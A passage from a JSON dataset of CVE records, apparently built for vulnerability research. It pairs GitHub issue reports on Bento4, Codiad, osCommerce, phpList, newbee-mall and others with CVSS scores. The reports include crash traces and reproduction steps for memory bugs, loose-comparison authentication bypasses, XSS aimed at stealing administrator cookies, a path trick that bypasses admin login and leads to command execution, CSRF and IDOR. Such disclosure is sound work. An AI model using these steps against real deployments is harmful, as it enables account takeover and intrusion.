fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING Information provided by crashwalk: CRASH SUMMARY Filename: APITAG SHA1: APITAG Classification: EXPLOITABLE Hash: APITAG Command: ./mp NUMBERTAG aac psym APITAG /tmp/out.aac Faulting Frame: operator new(unsigned long NUMBERTAG ffff7e5f1d9: in PATHTAG Disassembly NUMBERTAG ffff7bef3da: xor edx,ed NUMBERTAG ffff7bef3dc: mov rsi,r NUMBERTAG ffff7bef3df: mov edi NUMBERTAG ffff7bef3e4: mov ea NUMBERTAG e NUMBERTAG ffff7bef3e9: syscall NUMBERTAG ffff7bef3eb: mov rax,QWORD PTR [rsp NUMBERTAG ffff7bef3f3: xor rax,QWORD PTR fs NUMBERTAG ffff7bef3fc: jne NUMBERTAG ffff7bef NUMBERTAG APITAG NUMBERTAG ffff7bef3fe: mov eax,r8d NUMBERTAG ffff7bef NUMBERTAG add rsp NUMBERTAG Stack Head NUMBERTAG entries): __GI_raise NUMBERTAG ffff7bef3eb: in (BL) __GI_abort NUMBERTAG ffff7bce NUMBERTAG in (BL) __libc_message NUMBERTAG ffff7c NUMBERTAG e: in (BL) malloc_printerr NUMBERTAG ffff7c NUMBERTAG dc: in (BL) _int_malloc NUMBERTAG ffff7c NUMBERTAG a: in (BL) __GI___libc_malloc NUMBERTAG ffff7c NUMBERTAG in (BL) operator NUMBERTAG ffff7e5f1d9: in PATHTAG APITAG NUMBERTAG bbc NUMBERTAG in PATHTAG APITAG NUMBERTAG f3fee: in PATHTAG APITAG NUMBERTAG ccadd: in PATHTAG APITAG NUMBERTAG cdb9c: in PATHTAG APITAG NUMBERTAG db NUMBERTAG in PATHTAG APITAG NUMBERTAG dbbfd: in PATHTAG APITAG NUMBERTAG cb NUMBERTAG in PATHTAG APITAG NUMBERTAG cdb9c: in PATHTAG APITAG NUMBERTAG db NUMBERTAG in PATHTAG Registers: ra NUMBERTAG rb NUMBERTAG ffff7a NUMBERTAG rc NUMBERTAG ffff7bef3eb rd NUMBERTAG rsi NUMBERTAG fffffffce NUMBERTAG rdi NUMBERTAG rbp NUMBERTAG fffffffd NUMBERTAG rsp NUMBERTAG fffffffce NUMBERTAG r NUMBERTAG r NUMBERTAG fffffffce NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG fffffffd0b0 r NUMBERTAG r NUMBERTAG ffff7ffb NUMBERTAG r NUMBERTAG rip NUMBERTAG ffff7bef3eb efl NUMBERTAG cs NUMBERTAG ss NUMBERTAG b ds NUMBERTAG es NUMBERTAG fs NUMBERTAG gs NUMBERTAG Extra Data: Description: Heap error Short description: ERRORTAG NUMBERTAG Explanation: The target's backtrace indicates that libc has detected a heap error or that the target was executing a heap function when it stopped. This could be due to heap corruption, passing a bad pointer to a heap function such as APITAG etc. Since heap errors might include buffer overflows, use after free situations, etc. they are generally considered exploitable. END SUMMARY",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23333",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/507",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/507",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2020-05-16T07:46:13Z",
        "description": "Heap buffer overflow in APITAG int, unsigned char, unsigned int, APITAG I use my fuzzing project framework to find some vulnerabilities in mp NUMBERTAG aac with command line: mp NUMBERTAG aac APITAG /tmp/out.aac I found a heap buffer overflow in APITAG int, unsigned char, unsigned int, APITAG The output of address sanitizer is like this: APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG a NUMBERTAG at pc NUMBERTAG a NUMBERTAG bp NUMBERTAG fff NUMBERTAG bd0 sp NUMBERTAG fff NUMBERTAG bc8 READ of size NUMBERTAG at NUMBERTAG a NUMBERTAG thread T NUMBERTAG a NUMBERTAG in APITAG int, unsigned char, unsigned int, APITAG ( PATHTAG NUMBERTAG f NUMBERTAG in APITAG int, APITAG ( PATHTAG NUMBERTAG d NUMBERTAG fc in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG cc4e in APITAG int, unsigned long long, bool, bool, APITAG APITAG ( PATHTAG NUMBERTAG d3aa2 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG b NUMBERTAG d in APITAG int, unsigned char, unsigned int, APITAG APITAG ( PATHTAG NUMBERTAG ad NUMBERTAG in APITAG int, APITAG APITAG ( PATHTAG NUMBERTAG d NUMBERTAG c8 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG cc4e in APITAG int, unsigned long long, bool, bool, APITAG APITAG ( PATHTAG NUMBERTAG d3aa2 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG cc4e in APITAG int, unsigned long long, bool, bool, APITAG APITAG ( PATHTAG NUMBERTAG d3aa2 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG int, unsigned long long, bool, APITAG APITAG ( PATHTAG NUMBERTAG a3d1b in APITAG int, APITAG APITAG ( PATHTAG NUMBERTAG d2fe8 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG db in APITAG APITAG &) ( PATHTAG NUMBERTAG e in APITAG APITAG bool) ( PATHTAG NUMBERTAG bb in APITAG bool) ( PATHTAG NUMBERTAG in main ( PATHTAG NUMBERTAG f7c4ad NUMBERTAG e2 in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG d in _start ( PATHTAG NUMBERTAG a NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG de NUMBERTAG in operator APITAG long) PATHTAG NUMBERTAG d in APITAG int, unsigned char, unsigned int, APITAG ( PATHTAG NUMBERTAG f NUMBERTAG in APITAG int, APITAG ( PATHTAG NUMBERTAG d NUMBERTAG fc in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG cc4e in APITAG int, unsigned long long, bool, bool, APITAG APITAG ( PATHTAG NUMBERTAG d3aa2 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG b NUMBERTAG d in APITAG int, unsigned char, unsigned int, APITAG APITAG ( PATHTAG NUMBERTAG ad NUMBERTAG in APITAG int, APITAG APITAG ( PATHTAG NUMBERTAG d NUMBERTAG c8 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG cc4e in APITAG int, unsigned long long, bool, bool, APITAG APITAG ( PATHTAG NUMBERTAG d3aa2 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG cc4e in APITAG int, unsigned long long, bool, bool, APITAG APITAG ( PATHTAG NUMBERTAG d3aa2 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG int, unsigned long long, bool, APITAG APITAG ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG db in APITAG APITAG &) ( PATHTAG NUMBERTAG e in APITAG APITAG bool) ( PATHTAG NUMBERTAG bb in APITAG bool) ( PATHTAG NUMBERTAG in main ( PATHTAG NUMBERTAG f7c4ad NUMBERTAG e2 in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap buffer overflow ( PATHTAG ) in APITAG int, unsigned char, unsigned int, APITAG Shadow bytes around the buggy address NUMBERTAG c0e7fff NUMBERTAG f0: fa fa NUMBERTAG fa fa fa fa NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa fa NUMBERTAG c0e7fff NUMBERTAG fa]fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23334",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/508",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/508",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2020-05-16T07:59:15Z",
        "description": "SEGV on unknown address by a WRITE memory access in APITAG int, unsigned long long, APITAG I found a crash by running \"./mp NUMBERTAG aac APITAG APITAG The crash is identified as \"EXPLOITABLE\" by crashwalk. The result of crashwalk (!exploitable) is: CRASH SUMMARY Filename: APITAG SHA1: APITAG Classification: EXPLOITABLE Hash: APITAG Command: ./mp NUMBERTAG aac psym APITAG /tmp/out.aac Faulting Frame: APITAG int, unsigned long long, APITAG NUMBERTAG cac NUMBERTAG in PATHTAG Disassembly NUMBERTAG cac NUMBERTAG mov r NUMBERTAG ra NUMBERTAG cac NUMBERTAG call NUMBERTAG ac NUMBERTAG APITAG NUMBERTAG cac6b: lea eax,[rb NUMBERTAG cac6e: mov rsi,r NUMBERTAG cac NUMBERTAG mov rdi,rbp NUMBERTAG cac NUMBERTAG mov BYTE PTR [r NUMBERTAG ra NUMBERTAG cac NUMBERTAG call NUMBERTAG bbc NUMBERTAG APITAG NUMBERTAG cac7e: pop rb NUMBERTAG cac7f: pop rbp NUMBERTAG cac NUMBERTAG pop r NUMBERTAG Stack Head NUMBERTAG entries): APITAG NUMBERTAG cac NUMBERTAG in PATHTAG APITAG NUMBERTAG cbac2: in PATHTAG APITAG NUMBERTAG cdb9c: in PATHTAG APITAG NUMBERTAG db NUMBERTAG in PATHTAG APITAG NUMBERTAG dbbfd: in PATHTAG APITAG NUMBERTAG cb NUMBERTAG in PATHTAG APITAG NUMBERTAG cdb9c: in PATHTAG APITAG NUMBERTAG db NUMBERTAG in PATHTAG APITAG NUMBERTAG db NUMBERTAG in PATHTAG APITAG NUMBERTAG bdef3: in PATHTAG APITAG NUMBERTAG cbf9c: in PATHTAG APITAG NUMBERTAG cdb9c: in PATHTAG APITAG NUMBERTAG db NUMBERTAG in PATHTAG APITAG NUMBERTAG db NUMBERTAG in PATHTAG APITAG NUMBERTAG aee5a: in PATHTAG APITAG NUMBERTAG cc NUMBERTAG a: in PATHTAG Registers: ra NUMBERTAG ffffffff rb NUMBERTAG rc NUMBERTAG fe0 rd NUMBERTAG rsi NUMBERTAG fd0 rdi NUMBERTAG fb8 rbp NUMBERTAG fb8 rsp NUMBERTAG fffffffd NUMBERTAG r NUMBERTAG fd0 r NUMBERTAG fffffffd NUMBERTAG r NUMBERTAG r NUMBERTAG ffff7d NUMBERTAG be0 r NUMBERTAG fd0 r NUMBERTAG a0 r NUMBERTAG r NUMBERTAG a0 rip NUMBERTAG cac NUMBERTAG efl NUMBERTAG cs NUMBERTAG ss NUMBERTAG b ds NUMBERTAG es NUMBERTAG fs NUMBERTAG gs NUMBERTAG Extra Data: Description: Access violation on destination operand Short description: APITAG NUMBERTAG Explanation: The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value. END SUMMARY The result of address sanitizer is: APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG cf (pc NUMBERTAG c9eba bp NUMBERTAG ffedaf NUMBERTAG b0 sp NUMBERTAG ffedaf NUMBERTAG T0) APITAG signal is caused by a WRITE memory access NUMBERTAG c9eb9 in APITAG int, unsigned long long, APITAG ( PATHTAG NUMBERTAG d3ed8 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG cc4e in APITAG int, unsigned long long, bool, bool, APITAG APITAG ( PATHTAG NUMBERTAG d3aa2 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG int, unsigned long long, bool, APITAG APITAG ( PATHTAG NUMBERTAG a3d1b in APITAG int, APITAG APITAG ( PATHTAG NUMBERTAG d2fe8 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG int, unsigned long long, bool, APITAG APITAG ( PATHTAG NUMBERTAG ccec in APITAG int, APITAG APITAG ( PATHTAG NUMBERTAG d3a NUMBERTAG in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG db in APITAG APITAG &) ( PATHTAG NUMBERTAG e in APITAG APITAG bool) ( PATHTAG NUMBERTAG bb in APITAG bool) ( PATHTAG NUMBERTAG in main ( PATHTAG NUMBERTAG f NUMBERTAG cf NUMBERTAG e2 in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG d in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV ( PATHTAG ) in APITAG int, unsigned long long, APITAG NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23355",
        "Issue_Url_old": "https://github.com/Codiad/Codiad/issues/1121",
        "Issue_Url_new": "https://github.com/codiad/codiad/issues/1121",
        "Repo_new": "codiad/codiad",
        "Issue_Created_At": "2020-05-21T11:11:22Z",
        "description": "Potential risk of authentication bypass through magic hash and loose comparison. PATHTAG () URLTAG is potentially vulnerable to the magic hash problem, and the authentication can be bypassed in the loose comparison (==) If encrypted or hash value for the passwords form certain formats of magic hash, e.g NUMBERTAG e NUMBERTAG it can be bypassed. For example, if the server side stored password is a magic hash, then another user can also try a magic hash password to authenticate. It can be avoided by using strict comparison \u201c===\u201c. More info about magic hash can be found here URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23359",
        "Issue_Url_old": "https://github.com/renlok/WeBid/issues/530",
        "Issue_Url_new": "https://github.com/renlok/webid/issues/530",
        "Repo_new": "renlok/webid",
        "Issue_Created_At": "2020-05-25T08:11:30Z",
        "description": "Funcational bugs in password rechecking during registration related processes. APITAG NUMBERTAG FILETAG has the problem of password rechecking during registration because it uses a loose comparison to check the identicalness of two passwords. Two non identical passwords can still bypass the check. A lot of other PHP scripts in APITAG also have this problem including FILETAG , APITAG FILETAG , APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23360",
        "Issue_Url_old": "https://github.com/osCommerce/oscommerce2/issues/658",
        "Issue_Url_new": "https://github.com/oscommerce/oscommerce2/issues/658",
        "Repo_new": "oscommerce/oscommerce2",
        "Issue_Created_At": "2020-05-26T05:59:06Z",
        "description": "Username and password recheck bypassed. Hi, I just find that, in many places of oscommerce NUMBERTAG the username and password recheck during registration and other processes can be bypassed easily through the magic string in loose comparison, for example APITAG returns APITAG . If the user sets the username or password to such magic strings, the recheck process using loose comparison (==) does not work at all. Affected code locations PATHTAG URLTAG PATHTAG L NUMBERTAG URLTAG PATHTAG L NUMBERTAG URLTAG PATHTAG L NUMBERTAG URLTAG and some other files in APITAG , APITAG and APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23361",
        "Issue_Url_old": "https://github.com/phpList/phplist3/issues/668",
        "Issue_Url_new": "https://github.com/phplist/phplist3/issues/668",
        "Repo_new": "phplist/phplist3",
        "Issue_Created_At": "2020-05-26T07:47:33Z",
        "description": "Bypass authentication through loose comparison. APITAG URLTAG has the potential of authentication bypass problem through loose comparison. (==). Here is another [example]. URLTAG A similar CVE can be found [ CVETAG CVETAG and here URLTAG In addition, in URLTAG It also uses a loose comparison. The functionality might not perform correctly for the password rechecking in the magic strings cases. For example NUMBERTAG e NUMBERTAG and NUMBERTAG e NUMBERTAG shall be equal under loose comparison, but actually they are not.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23369",
        "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/46",
        "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/46",
        "Repo_new": "yzmcms/yzmcms",
        "Issue_Created_At": "2020-05-22T17:05:17Z",
        "description": "XSS exists in APITAG NUMBERTAG Description In APITAG NUMBERTAG SS in PATHTAG via the SRC attribute of an IFRAME element because of using APITAG NUMBERTAG APITAG APITAG Script tags are filtered, but iframe tags are not: FILETAG FILETAG Refer to: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-23370",
        "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/45",
        "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/45",
        "Repo_new": "yzmcms/yzmcms",
        "Issue_Created_At": "2020-05-22T16:55:04Z",
        "description": "A Stored XSS exists in APITAG NUMBERTAG Description In APITAG NUMBERTAG Stored XSS exists via the PATHTAG action parameter, which allows remote attackers to upload a swf file. The swf file can be injected arbitrary web script or HTML. APITAG In PATHTAG when the value of action parameter is 'uploadvideo' or 'uploadfile', it allows remote user to upload a swf file: CODETAG So I write and compile an evil swf file whose source code is as follows: APITAG Then I upload the swf file through PATHTAG without login: FILETAG When background administrator previews this attachment, it will cause XSS attack: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-23371",
        "Issue_Url_old": "https://github.com/nangge/noneCms/issues/30",
        "Issue_Url_new": "https://github.com/nangge/nonecms/issues/30",
        "Repo_new": "nangge/nonecms",
        "Issue_Created_At": "2020-06-02T14:43:00Z",
        "description": "APITAG NUMBERTAG has a XSS vulnerability in PATHTAG APITAG NUMBERTAG has a XSS vulnerability in PATHTAG I download the swfupload.swf file and I use APITAG to decompile the file. Then I find that user can control the APITAG parameter which will concatenate as the value of APITAG FILETAG Then I check the APITAG function, this is a piece of code that exists a Flash XSS vulnerability: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-23373",
        "Issue_Url_old": "https://github.com/nangge/noneCms/issues/33",
        "Issue_Url_new": "https://github.com/nangge/nonecms/issues/33",
        "Repo_new": "nangge/nonecms",
        "Issue_Created_At": "2020-06-03T02:49:26Z",
        "description": "APITAG NUMBERTAG has a stored XSS vulnerability in PATHTAG Cross site scripting (XSS) vulnerability in PATHTAG in APITAG NUMBERTAG allows remote authenticated attackers to inject arbitrary web script or HTML via the name parameter. A remote user who has the right to modify navigation management can inject arbitrary web script or HTML in PATHTAG via the name parameter to cause xss attack. APITAG ERRORTAG FILETAG When front end users visit this column, it can also cause xss attack: APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-23374",
        "Issue_Url_old": "https://github.com/nangge/noneCms/issues/32",
        "Issue_Url_new": "https://github.com/nangge/nonecms/issues/32",
        "Repo_new": "nangge/nonecms",
        "Issue_Created_At": "2020-06-03T02:42:24Z",
        "description": "APITAG NUMBERTAG has a XSS vulnerability. Cross site scripting (XSS) vulnerability in PATHTAG in APITAG NUMBERTAG allows remote authenticated attackers to inject arbitrary web script or HTML via the name parameter. By default, APITAG uses FILETAG for users to editor their articles. However, FILETAG has a XSS vulnerability. A remote user who has the right to editor articles can inject arbitrary web script or HTML in PATHTAG APITAG ERRORTAG APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-23376",
        "Issue_Url_old": "https://github.com/nangge/noneCms/issues/35",
        "Issue_Url_new": "https://github.com/nangge/nonecms/issues/35",
        "Repo_new": "nangge/nonecms",
        "Issue_Created_At": "2020-06-04T12:01:26Z",
        "description": "APITAG NUMBERTAG has a CSRF vulnerability in PATHTAG APITAG NUMBERTAG has a CSRF vulnerability in PATHTAG as demonstrated by adding a navigation column which can be injected arbitrary web script or HTML via the name parameter to launch a stored XSS attack. Vulnerability code is located in PATHTAG ERRORTAG No CSRF token here. We can also use APITAG as proxy to see that the PATHTAG API doesn't use csrf token: FILETAG When the administrator visits the malicious link, the page will automatically click to trigger the CSRF attack: FILETAG When back end administrator accesses the background or the front end user accesses the column, it will trigger xss attack: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-23447",
        "Issue_Url_old": "https://github.com/newbee-ltd/newbee-mall/issues/33",
        "Issue_Url_new": "https://github.com/newbee-ltd/newbee-mall/issues/33",
        "Repo_new": "newbee-ltd/newbee-mall",
        "Issue_Created_At": "2020-05-27T01:07:36Z",
        "description": "There is xss in the front desk which can get hazards such as administrator cookies. APITAG an environment to simulate users selecting products at the front desk\u2014\u2014add to cart\u2014\u2014confirm order pay\uff1a URLTAG Insert the payload here at the harvest information: APITAG alert APITAG APITAG FILETAG APITAG the administrator logs in to the background, XSS will be triggered when viewing the APITAG Recipient Information\" of this order in the APITAG Management Office\" FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-23448",
        "Issue_Url_old": "https://github.com/newbee-ltd/newbee-mall/issues/34",
        "Issue_Url_new": "https://github.com/newbee-ltd/newbee-mall/issues/34",
        "Repo_new": "newbee-ltd/newbee-mall",
        "Issue_Created_At": "2020-05-27T02:40:23Z",
        "description": "System background authentication can be bypassed. APITAG authentication logic of the system's background /admin is in code APITAG FILETAG APITAG can easily be bypassed, like request //admin NUMBERTAG We delete the requested cookie field and then request /admin,returns NUMBERTAG FILETAG APITAG if we request //admin\uff0cWe can perform administrator actions without logging in\uff0c For example, upload a babat file\uff1a FILETAG It can execute any server command\uff0csuch as calc\uff1a FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23449",
        "Issue_Url_old": "https://github.com/newbee-ltd/newbee-mall/issues/35",
        "Issue_Url_new": "https://github.com/newbee-ltd/newbee-mall/issues/35",
        "Repo_new": "newbee-ltd/newbee-mall",
        "Issue_Created_At": "2020-05-27T03:35:28Z",
        "description": "IDOR causes unauthorized changes to any user information. PATHTAG interface can be used to update user information\uff1a FILETAG APITAG corresponding code is as follows\uff1a FILETAG Track APITAG method\uff1a FILETAG APITAG code updates the information after querying by the value of userid, so you can modify any user information by tampering with the value of APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23469",
        "Issue_Url_old": "https://github.com/gmate/gmate/issues/191",
        "Issue_Url_new": "https://github.com/gmate/gmate/issues/191",
        "Repo_new": "gmate/gmate",
        "Issue_Created_At": "2020-05-29T11:36:15Z",
        "description": "Regular Expression APITAG vulnerability in the gedit3 plugin. Regular Expression APITAG vulnerability in the gedit3 plugin We are working on the APITAG URLTAG problem and detected two vulnerable regexes from your gedit3 plugin code. Vulnerable rege NUMBERTAG APITAG in FILETAG It takes forever for the regex to match the string APITAG We suggest you change the structure APITAG , since \".\" can accept \"<\" and \">\". Vulnerable rege NUMBERTAG FILETAG and FILETAG This vulnerability can be triggered by CODETAG Both APITAG and APITAG can match APITAG , we suggest you to change APITAG since this branch is mainly included in APITAG . We didn\u2019t create a pull request because we're not sure if these cases are possible to take place in your program, we also do not understand the functionality of these regexes as you do. Thank you for your understanding.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23478",
        "Issue_Url_old": "https://github.com/leo-editor/leo-editor/issues/1597",
        "Issue_Url_new": "https://github.com/leo-editor/leo-editor/issues/1597",
        "Repo_new": "leo-editor/leo-editor",
